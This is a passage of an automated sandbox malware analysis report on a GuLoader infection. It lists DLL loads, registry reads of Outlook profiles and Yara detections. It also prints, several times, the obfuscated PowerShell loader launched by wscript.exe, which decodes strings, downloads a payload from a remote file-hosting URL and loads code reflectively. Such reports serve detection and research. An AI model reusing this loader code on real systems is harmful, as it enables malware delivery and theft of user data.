Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: cryptdlg.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: msoert2.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: msftedit.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: actxprxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: cryptdlg.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: msoert2.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: msftedit.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Section loaded: iertutil.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe

File opened: C:\Windows\SysWOW64\msftedit.dll

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbXiz source: powershell.exe, 00000005.00000002.2595421485.0000000007B7E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2595421485.0000000007B7E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbf` source: powershell.exe, 00000005.00000002.2595421485.0000000007B5E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wab.pdb source: newfile.exe

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: POWERSHELL "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatini", "0")

Yara detected GuLoader

Source: Yara match	File source: 00000005.00000002.2603283847.000000000CA31000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3346276290.0000000007441000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2591546419.00000000062C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2603130560.0000000008EA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2895451341.00000243B8200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Lenet)$global:Scoffs = [System.Text.Encoding]::ASCII.GetString($Unionisters)$global:Superincumbent163=$Scoffs.substring(315073,27430)<#Retfrdighed Advokaturernes yondward Strafefterg
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Storhertug $buningens $Ideologic), (Hensattes @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Paddy = [AppDomain]::CurrentDomain.GetAssemblies()$global:Cla
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Paramastitis)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Kidders21, $false).DefineType($Hidfrtes, $Sl
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Lenet)$global:Scoffs = [System.Text.Encoding]::ASCII.GetString($Unionisters)$global:Superincumbent163=$Scoffs.substring(315073,27430)<#Retfrdighed Advokaturernes yondward Strafefterg

Suspicious powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. B.rgHAnchye DuraarangsdPrivael
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. B.rgHAnchye DuraarangsdPrivael
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia 